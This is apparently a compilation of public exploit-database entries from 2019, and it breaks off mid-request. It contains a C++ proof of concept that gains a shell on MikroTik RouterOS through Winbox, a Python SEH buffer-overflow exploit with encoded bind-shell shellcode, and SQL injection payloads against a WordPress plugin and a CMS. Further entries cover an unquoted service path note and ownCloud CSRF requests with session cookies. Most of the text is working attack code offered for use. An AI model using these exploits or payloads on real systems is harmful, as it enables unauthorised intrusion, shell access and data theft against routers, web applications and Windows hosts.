{u4:584628317,uff0003:2,uff0006:1,s3:'example.com',U6:[584628317],U7:[21496],Uff0001:[],Uff0002:[14],S5:['example.com']} # albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ssh [email protected] # ... # [admin@MikroTik] > ip dns cache print # Flags: S - static # # NAME ADDRESS TTL # 0 example.com 93.184.216.34 5h57m57s # [admin@MikroTik] > # ``` # Source: # https://github.com/tenable/routeros/tree/master/poc/winbox_dns_request /* Copyright 2019 Tenable, Inc. * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include <fstream> #include <cstdlib> #include <iostream> #include <boost/cstdint.hpp> #include <boost/program_options.hpp> #include <boost/algorithm/string.hpp> #include "winbox_session.hpp" #include "winbox_message.hpp" namespace { const char s_version[] = "CVE-2019-3943 PoC Using SNMP dlopen"; bool parseCommandLine(int p_argCount, const char* p_argArray[], std::string& p_username, std::string& p_password, std::string& p_ip, std::string& p_port) { boost::program_options::options_description description("options"); description.add_options() ("help,h", "A list of command line options") ("version,v", "Display version information") ("username,u", boost::program_options::value<std::string>(), "The user to log in as") ("password", boost::program_options::value<std::string>(), "The password to log in with") ("port,p", boost::program_options::value<std::string>()->default_value("8291"), "The Winbox port to connect to") ("ip,i", boost::program_options::value<std::string>(), "The IPv4 address to connect to"); boost::program_options::variables_map argv_map; try { boost::program_options::store( boost::program_options::parse_command_line( p_argCount, p_argArray, description), argv_map); } catch (const std::exception& e) { std::cerr << e.what() << "\n" << std::endl; std::cerr << description << std::endl; return false; } boost::program_options::notify(argv_map); if (argv_map.empty() || argv_map.count("help")) { std::cerr << description << std::endl; return false; } if (argv_map.count("version")) { std::cerr << "Version: " << ::s_version << std::endl; return false; } if (argv_map.count("username") && argv_map.count("ip") & argv_map.count("port")) { p_username.assign(argv_map["username"].as<std::string>()); p_ip.assign(argv_map["ip"].as<std::string>()); p_port.assign(argv_map["port"].as<std::string>()); if (argv_map.count("password")) { p_password.assign(argv_map["password"].as<std::string>()); } else { p_password.assign(""); } return true; } else { std::cerr << description << std::endl; } return false; } } int main(int p_argc, const char** p_argv) { std::string username; std::string password; std::string ip; std::string port; if (!parseCommandLine(p_argc, p_argv, username, password, ip, port)) { return EXIT_FAILURE; } Winbox_Session winboxSession(ip, port); if (!winboxSession.connect()) { std::cerr << "Failed to connect to the remote host" << std::endl; return EXIT_FAILURE; } boost::uint32_t p_session_id = 0; if (!winboxSession.login(username, password, p_session_id)) { std::cerr << "[-] Login failed." << std::endl; return false; } WinboxMessage msg; msg.set_to(0x4c); msg.set_command(0xa0065); msg.set_request_id(1); msg.set_reply_expected(true); msg.add_u32(5,80); // height msg.add_u32(6,24); // width msg.add_u32(8,1); // controls method. 0 (nova/bin/login), 1 (telnet), 2 (ssh), 3 (mactel), 4 (nova/bin/telser), default... msg.add_string(0x0a, username); //username msg.add_string(1,""); msg.add_string(7, "vt102"); msg.add_string(9, "-l a"); // drop into telnet client shell winboxSession.send(msg); msg.reset(); if (!winboxSession.receive(msg)) { std::cerr << "Error receiving a response." << std::endl; return EXIT_FAILURE; } if (msg.has_error()) { std::cout << "error: " << msg.get_error_string() << std::endl; } boost::uint32_t session_id = msg.get_u32(0xfe0001); msg.reset(); msg.set_to(0x4c); msg.set_command(0xa0068); msg.set_request_id(2); msg.set_reply_expected(true); msg.add_u32(5,82); msg.add_u32(6,24); msg.add_u32(0xfe0001, session_id); winboxSession.send(msg); boost::uint32_t tracker = 0; msg.reset(); if (!winboxSession.receive(msg)) { std::cerr << "Error receiving a response." << std::endl; return EXIT_FAILURE; } msg.reset(); msg.set_to(0x4c); msg.set_command(0xa0067); msg.set_request_id(3); msg.set_reply_expected(true); msg.add_u32(3, tracker); msg.add_u32(0xfe0001, session_id); winboxSession.send(msg); msg.reset(); if (!winboxSession.receive(msg)) { std::cerr << "Error receiving a response." << std::endl; return EXIT_FAILURE; } if (msg.has_error()) { std::cout << msg.serialize_to_json() << std::endl; std::cout << "error: " << msg.get_error_string() << std::endl; return EXIT_FAILURE; } else if (!msg.get_raw(0x02).empty()) { std::string raw_payload(msg.get_raw(0x02)); tracker += raw_payload.size(); } //{u3:1047,ufe0001:0,uff0007:655463,r2:[115],Uff0001:[76],Uff0002:[0,456]} msg.reset(); msg.set_to(0x4c); msg.set_command(0xa0067); msg.set_request_id(4); msg.set_reply_expected(true); msg.add_u32(3, tracker); msg.add_u32(0xfe0001, session_id); msg.add_raw(2, "set tracefile /pckg/option\n"); winboxSession.send(msg); bool found_telnet_prompt = false; while (!found_telnet_prompt) { msg.reset(); if (!winboxSession.receive(msg)) { std::cerr << "Error receiving a response." << std::endl; return EXIT_FAILURE; } if (msg.has_error()) { std::cout << msg.serialize_to_json() << std::endl; std::cout << "error: " << msg.get_error_string() << std::endl; return EXIT_FAILURE; } else if (!msg.get_raw(0x02).empty()) { std::string raw_payload(msg.get_raw(0x02)); if (raw_payload.find("telnet> ") != std::string::npos) { std::cout << "Success!" << std::endl; found_telnet_prompt = true; } } } return EXIT_SUCCESS; }

# Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection # Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/" # Date: 2019-07-02 # Exploit Author: Princy Edward # Exploit Author Blog : https://prinyedward.blogspot.com/ # Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/ # Version: 6.1 # Tested on: Apache/2.2.24 (CentOS) # CVE : #POC : GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=*** &taction=edit HTTP/1.1 #SQLMAP Result : sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests: --- Parameter: tid (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM (SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit # Changeset: # Issue fixed in version 6.2 # https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail= Cheers! PrincyEdward

# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH) # Google Dork: N/A # Date: 2019-10-30 # Exploit Author: Doan Nguyen (4ll4u) # Vendor Homepage:https://www.alloksoft.com/ # Software Link: https://www.alloksoft.com/wmv.htm # Version: v4.6.1217 # Tested on: Windows XP SP3 # CVE : N/A # Reference from : [1] https://www.exploit-db.com/exploits/47563 # 1.- Run python code :poc.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey' # 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code' # 5.- Click 'OK' and you will get a bind shell on port 4444 #msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -b '\x00' -f hex #We need to create meaningful characters when pasting into the password on the application (allow characters include:\x21->\x7E in ASCII TABLE) shellcode = ( "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x2A\x52\x25\x2D\x53\x2A\x52\x25\x2D\x55\x2A\x52\x25\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x34\x4D\x68\x2D\x23\x34\x4D\x68\x2D\x24\x36\x4D\x69\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x5C\x30\x75\x2D\x62\x5C\x30\x75\x2D\x62\x5E\x31\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x73\x71\x3B\x2D\x60\x73\x71\x3B\x2D\x61\x75\x73\x3D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x39\x6F\x40\x2D\x4B\x39\x6F\x40\x2D\x4C\x39\x70\x40\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x47\x44\x27\x2D\x62\x47\x44\x27\x2D\x63\x47\x45\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x36\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x6A\x28\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x47\x21\x25\x28\x2D\x47\x21\x25\x28\x2D\x49\x22\x27\x29\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x44\x56\x34\x3C\x2D\x44\x56\x34\x3C\x2D\x45\x58\x35\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x57\x31\x33\x44\x2D\x57\x31\x33\x44\x2D\x58\x32\x34\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x6E\x4F\x50\x2D\x3C\x6E\x4F\x50\x2D\x3E\x70\x50\x52\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x38\x33\x5F\x2D\x3F\x38\x33\x5F\x2D\x40\x39\x33\x60\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x4D\x38\x22\x2D\x6F\x4D\x38\x22\x2D\x6F\x4F\x3A\x24\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x72\x56\x55\x2D\x62\x72\x56\x55\x2D\x63\x74\x58\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x66\x52\x53\x2D\x4B\x66\x52\x53\x2D\x4C\x67\x52\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3B\x22\x35\x71\x2D\x3B\x22\x35\x71\x2D\x3C\x22\x37\x72\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x4F\x64\x55\x2D\x2E\x4F\x64\x55\x2D\x2E\x51\x65\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x48\x59\x5A\x2D\x59\x48\x59\x5A\x2D\x5B\x4A\x59\x5B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x62\x5C\x5A\x2D\x49\x62\x5C\x5A\x2D\x4A\x64\x5C\x5C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x63\x54\x2A\x47\x2D\x63\x54\x2A\x47\x2D\x65\x55\x2A\x47\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x4D\x4D\x43\x2D\x48\x4D\x4D\x43\x2D\x49\x4F\x4E\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x75\x60\x3A\x2D\x30\x75\x60\x3A\x2D\x32\x75\x60\x3A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x6B\x3F\x52\x2D\x60\x6B\x3F\x52\x2D\x60\x6D\x40\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x47\x21\x58\x2D\x3F\x47\x21\x58\x2D\x3F\x49\x22\x58\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x27\x4C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3E\x35\x60\x46\x2D\x3E\x35\x60\x46\x2D\x3E\x37\x60\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x45\x2E\x2D\x41\x2D\x45\x2E\x2D\x41\x2D\x45\x30\x2E\x42\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6C\x4B\x74\x4C\x2D\x6C\x4B\x74\x4C\x2D\x6E\x4C\x74\x4C\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x42\x43\x29\x26\x2D\x42\x43\x29\x26\x2D\x43\x43\x2A\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x61\x43\x34\x2D\x2F\x61\x43\x34\x2D\x31\x61\x45\x34\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x50\x58\x4B\x69\x2D\x50\x58\x4B\x69\x2D\x52\x59\x4D\x6A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x29\x29\x39\x2D\x71\x29\x29\x39\x2D\x73\x2B\x2A\x39\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x68\x52\x6D\x2D\x54\x68\x52\x6D\x2D\x55\x68\x52\x6D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x3C\x5B\x64\x2D\x20\x3C\x5B\x64\x2D\x21\x3E\x5B\x66\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x58\x6E\x65\x6B\x2D\x58\x6E\x65\x6B\x2D\x5A\x6F\x67\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x26\x52\x23\x2D\x69\x26\x52\x23\x2D\x69\x27\x54\x25\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x46\x3F\x27\x71\x2D\x46\x3F\x27\x71\x2D\x48\x40\x29\x72\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x24\x52\x54\x2D\x3C\x24\x52\x54\x2D\x3E\x26\x54\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x40\x4F\x55\x2D\x5C\x40\x4F\x55\x2D\x5D\x40\x51\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x34\x59\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x40\x5C\x5E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x4D\x6A\x3B\x2D\x49\x4D\x6A\x3B\x2D\x4A\x4F\x6C\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x23\x6B\x3D\x2D\x62\x23\x6B\x3D\x2D\x63\x23\x6B\x3F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x6A\x57\x67\x2D\x23\x6A\x57\x67\x2D\x24\x6C\x57\x67\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x43\x60\x50\x2D\x23\x43\x60\x50\x2D\x25\x43\x60\x50\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x33\x34\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x56\x63\x59\x2D\x38\x56\x63\x59\x2D\x39\x56\x65\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x52\x60\x66\x2D\x40\x52\x60\x66\x2D\x41\x53\x61\x67\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x24\x61\x73\x2A\x2D\x24\x61\x73\x2A\x2D\x26\x61\x75\x2A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x34\x53\x66\x2D\x48\x34\x53\x66\x2D\x48\x34\x54\x68\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x26\x57\x26\x2D\x3C\x26\x57\x26\x2D\x3C\x27\x58\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x26\x26\x2F\x50\x2D\x26\x26\x2F\x50\x2D\x27\x27\x2F\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x52\x2E\x62\x2D\x30\x52\x2E\x62\x2D\x30\x54\x30\x63\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x31\x5A\x75\x73\x2D\x31\x5A\x75\x73\x2D\x32\x5B\x75\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x41\x66\x56\x2D\x36\x41\x66\x56\x2D\x36\x42\x68\x57\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x63\x50\x32\x2D\x36\x63\x50\x32\x2D\x36\x63\x51\x33\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x4B\x23\x26\x2D\x59\x4B\x23\x26\x2D\x5A\x4C\x24\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x68\x4A\x4D\x2D\x28\x68\x4A\x4D\x2D\x2A\x69\x4B\x4F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x41\x53\x6A\x2D\x2E\x41\x53\x6A\x2D\x30\x42\x55\x6A\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2C\x44\x30\x30\x2D\x2C\x44\x30\x30\x2D\x2D\x46\x30\x31\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4A\x67\x69\x4F\x2D\x4A\x67\x69\x4F\x2D\x4A\x69\x69\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x44\x45\x68\x2D\x65\x44\x45\x68\x2D\x66\x44\x45\x6A\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x57\x32\x45\x2D\x6F\x57\x32\x45\x2D\x6F\x59\x34\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x35\x2C\x45\x43\x2D\x35\x2C\x45\x43\x2D\x37\x2C\x46\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x4A\x5A\x6D\x2D\x69\x4A\x5A\x6D\x2D\x6A\x4A\x5C\x6F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x54\x6B\x5E\x2D\x2F\x54\x6B\x5E\x2D\x2F\x56\x6B\x60\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x25\x6E\x55\x2D\x40\x25\x6E\x55\x2D\x41\x26\x6E\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x52\x6F\x33\x2D\x2D\x52\x6F\x33\x2D\x2D\x52\x70\x33\x2F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3A\x6E\x6D\x3D\x2D\x3A\x6E\x6D\x3D\x2D\x3B\x6E\x6E\x3E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x3D\x41\x4F\x2D\x4E\x3D\x41\x4F\x2D\x4F\x3D\x42\x4F\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x28\x48\x64\x2D\x49\x28\x48\x64\x2D\x4A\x28\x49\x64\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x2E\x5A\x59\x2D\x73\x2E\x5A\x59\x2D\x74\x2E\x5A\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x68\x29\x3A\x2D\x4E\x68\x29\x3A\x2D\x4F\x68\x2B\x3B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x21\x32\x38\x36\x2D\x21\x32\x38\x36\x2D\x22\x32\x38\x36\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x4C\x2B\x47\x2D\x53\x4C\x2B\x47\x2D\x54\x4C\x2B\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x2F\x47\x6B\x2D\x5C\x2F\x47\x6B\x2D\x5E\x31\x47\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x39\x5D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x35\x41\x22\x2D\x28\x35\x41\x22\x2D\x28\x36\x43\x22\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2D\x40\x6F\x2B\x2D\x2D\x40\x6F\x2B\x2D\x2F\x41\x6F\x2C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x42\x3C\x2B\x2D\x20\x42\x3C\x2B\x2D\x21\x43\x3E\x2D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x4E\x54\x2B\x2D\x3F\x4E\x54\x2B\x2D\x3F\x50\x54\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x29\x69\x53\x44\x2D\x29\x69\x53\x44\x2D\x2B\x6A\x54\x46\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x6B\x6F\x39\x2D\x62\x6B\x6F\x39\x2D\x62\x6C\x6F\x39\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x67\x6C\x40\x26\x2D\x67\x6C\x40\x26\x2D\x69\x6E\x41\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x59\x36\x44\x2D\x49\x59\x36\x44\x2D\x4A\x59\x37\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x61\x68\x61\x2E\x2D\x61\x68\x61\x2E\x2D\x61\x68\x63\x2E\x50" "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x70\x6f\x6f\x6f\x50\x50\x50" # push 12 NOP ) alignment = "\x54\x58\x2d\x54\x54\x54\x54\x2d\x37\x63\x54\x54\x2d\x25\x31\x57\x57\x50\x5C" # stack alignment 001292C0 - 0012AA10 jump_short = "\x90\x90\xEB\x08" # jump to 00129A44 pop_pop_ret ="\x09\x9a\x01\x10" # pop pop ret in SkinMagic.dll buffer = "\x41" * 780 + jump_short + pop_pop_ret + "\x41\x41\x41\x41" + alignment + shellcode + (6000 - 780 - 4 - 4 - len(shellcode) - len(alignment)) * "\x45" try: f=open("shell.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: TheJshen contentManagementSystem 1.04 - 'id' SQL Injection # Date: 2019-11-01 # Exploit Author: Cakes # Vendor Homepage: https://github.com/thejshen/contentManagementSystem # Version: 1.04 # Software Link: https://github.com/thejshen/contentManagementSystem.git # Tested on: CentOS7 # GET parameter 'id' easy SQL Injection --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=4' AND 5143=5143-- OWXt Vector: AND [INFERENCE] Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=4' AND (SELECT 4841 FROM (SELECT(SLEEP(5)))eqmp)-- ZwTG Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=-4903' UNION ALL SELECT NULL,NULL,CONCAT(0x716a706b71,0x66766f636c546750775053685352676c4f70724d714c4b64494e755252765a626370615a565a4b49,0x717a6a7671),NULL,NULL-- hkoh Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL[GENERIC_SQL_COMMENT]

# Title: OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path # Author: Sainadh Jamalpur # Date: 2019-10-31 # Vendor Homepage: https://openvpn.net/ # Software Link: https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe # Version : PrivateTunnel v2.8.4 # Tested on: Windows 10 64bit(EN) # CVE : N/A # ===================================================== # 1. Description: # Unquoted service paths in OpenVPN Private Tunnel v2.8.4 have an unquoted service path. #PoC =========== C:\>sc qc ovpnagent [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ovpnagent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ovpnagent.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OpenVPN Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> #Exploit: ============ A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: ownCloud 10.3.0 stable - Cross-Site Request Forgery # Date: 2019-10-31 # Exploit Author: Ozer Goker # Vendor Homepage: https://owncloud.org # Software Link: https://owncloud.org/download/ # Version: 10.3 # CVE: N/A # Introduction # Your personal cloud collaboration platform With over 50 million users # worldwide, ownCloud is the market-leading open source software for # cloud-based collaboration platforms. As an alternative to Dropbox, OneDrive # and Google Drive, ownCloud offers real data security and privacy for you # and your data. ################################################################################################################################## # CSRF1 # Create Folder MKCOL /remote.php/dav/files/user/test HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest requesttoken: VREONXtUByUsCkMAcRscHjUGHjYGPBoHJQgsfzoHWEk=:fUCe0mdAzn0T3MNKlKqYMEBFcezMTukbmbVeDs+jKlo= Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k ################################################################################################################################## # CSRF2 # Delete Folder DELETE /remote.php/dav/files/user/test HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest requesttoken: HDQcAi5jLSkkKysEGiYxZSA7PhcaCWEYFydhQ106YEM=:/pQReZNMrOXPXpc0yvQxQp9YQJ7q3HShA9D2+R2EJuI= Origin: http://192.168.2.111 DNT: 1 Connection: close Cookie: oc_sessionPassphrase=OR9OqeaQvyNeBuV1nl53PSHIygj2x2pFuUkAADxM%2FtC02szlld2Y4paT3aMk28bZaspxaEBcsVuLqXjiWg5PGJ1YEb62nemDDPIHOJgQueBmroFVKinj4zQ2dojKhfOe; ocpcgo18irip=kgso9su4gnmmre6jv1jb0f6v8k ################################################################################################################################## # CSRF3 # Create User POST /index.php/settings/users/users HTTP/1.1 Host: 192.168.2.111 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: 